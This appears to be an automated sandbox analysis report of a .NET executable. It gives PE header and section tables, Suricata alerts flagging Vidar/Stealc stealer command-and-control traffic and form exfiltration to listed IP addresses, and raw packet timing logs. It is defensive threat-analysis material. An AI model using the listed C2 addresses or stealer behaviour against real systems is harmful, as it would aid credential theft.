                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                Instruction
                                                                                                                jmp dword ptr [00402000h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x91344 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x92000 | 0x4f4c | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x91328 | 0x1c | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0x8f39c | 0x8f400 | 7a6bd0c3e8a888f0050d6a8b86ec6c9b | False | 0.7787293439136126 | data | 7.623939353720136 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x92000 | 0x4f4c | 0x5000 | 913ad93970d837a98a9d365703d975ea | False | 0.9373046875 | data | 7.797308905282344 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x98000 | 0xc | 0x200 | dfc7922e346a5d168a08a16e96dab062 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x92100 | 0x4891 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9897722990795069 |
| RT_GROUP_ICON | 0x969a4 | 0x14 | data | | | 1.05 |
| RT_VERSION | 0x969c8 | 0x384 | data | | | 0.4066666666666667 |
| RT_MANIFEST | 0x96d5c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-08T04:59:37.752997+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49742 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:38.916623+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49743 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:40.295762+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49744 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:41.646972+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49745 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:42.331574+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.106.214 | 443 | 192.168.2.4 | 49745 | TCP |
| 2024-10-08T04:59:42.993948+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49746 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:43.686214+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.4 | 49746 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:43.686243+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.106.214 | 443 | 192.168.2.4 | 49746 | TCP |
| 2024-10-08T04:59:44.408957+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49747 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:45.421774+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49748 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:48.358591+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49749 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:49.452342+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49750 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:50.461923+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49751 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:51.554296+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49752 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:52.582976+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49753 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:54.335990+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49754 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:55.978719+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49756 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:57.531571+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49757 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T04:59:59.016134+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49764 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:00.287265+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49775 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:03.370299+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49793 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:04.549674+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49802 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:05.905361+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49812 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:07.445567+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49822 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:09.361394+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49835 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:11.344325+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49847 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:14.613134+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49868 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:14.868528+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49874 | 185.215.113.117 | 80 | TCP |
| 2024-10-08T05:00:16.152280+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49882 | 49.12.106.214 | 443 | TCP |
| 2024-10-08T05:00:17.634663+0200 | 2054495 | ET MALWARE Vidar Stealer Form Exfil | 1 | 192.168.2.4 | 49891 | 45.132.206.251 | 80 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                Oct 8, 2024 04:59:41.648910999 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331183910 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331211090 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331254005 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331285954 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331309080 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331403971 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331809998 CEST49745443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.331824064 CEST4434974549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.333317995 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333343983 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.333417892 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333723068 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.333739996 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.993510962 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.993947983 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.994590998 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.994623899 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:42.996997118 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:42.997030973 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686055899 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686130047 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.686249971 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686249971 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686305046 CEST49746443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.686326027 CEST4434974649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.752198935 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752290964 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:43.752388000 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752674103 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:43.752712011 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.408849001 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.408957005 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.411004066 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.411031961 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.413357973 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.413371086 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.413430929 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.413450956 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.762306929 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762356043 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:44.762449026 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762708902 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:44.762723923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187443018 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187607050 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.187773943 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.187773943 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.188488960 CEST49747443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.188533068 CEST4434974749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.421669960 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.421773911 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.422180891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.422188997 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.424027920 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.424032927 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853892088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853914976 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853929996 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.853965044 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.854002953 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.854016066 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.854065895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.884649992 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884666920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884727001 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.884737015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.884784937 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.957992077 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958022118 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958178997 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.958206892 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.958259106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.983899117 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.983913898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.983978987 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:45.983987093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:45.984025955 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.022608042 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022623062 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022728920 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.022742987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.022795916 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.047715902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047730923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047802925 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.047812939 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.047858000 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.069878101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.069890976 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.069999933 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.070012093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.070060968 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.085073948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085088015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085155010 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.085160971 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.085206985 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.103461981 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103477955 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103542089 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.103550911 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.103596926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.121381044 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121397018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121484041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.121493101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.121551037 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.135662079 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135675907 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135736942 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.135746002 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.135782957 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.151439905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151457071 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151619911 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.151628971 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.151681900 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164659023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164717913 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164827108 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164887905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.164937973 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.164963007 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173818111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173860073 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173891068 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173897028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.173933029 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.173959970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.183722019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183762074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183819056 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.183829069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.183877945 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191622972 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191663027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191723108 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191731930 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.191759109 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.191787958 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.200496912 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200537920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200586081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.200592995 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.200644970 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.208714962 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208755016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208801985 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.208808899 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.208867073 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.219695091 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613790035 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613837957 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613913059 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.613919020 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.613965988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.622747898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622773886 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622853041 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.622858047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.622905016 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.631520987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631546021 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631613016 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.631618023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.631659031 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.639076948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639100075 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639177084 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.639180899 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.639228106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.647993088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648051023 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648155928 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.648160934 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.648277998 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.671848059 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.671871901 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.671956062 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.671961069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.672010899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.685354948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685380936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685477972 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.685508013 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.685556889 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.696094990 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696109056 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696176052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.696206093 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.696254969 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.704418898 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704436064 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704513073 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.704519987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.704581022 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.716548920 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716562986 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716646910 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.716659069 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.716697931 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.720980883 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721038103 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721163988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.721170902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:46.721271992 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:46.729180098 CEST4434974849.12.106.214192.168.2.4
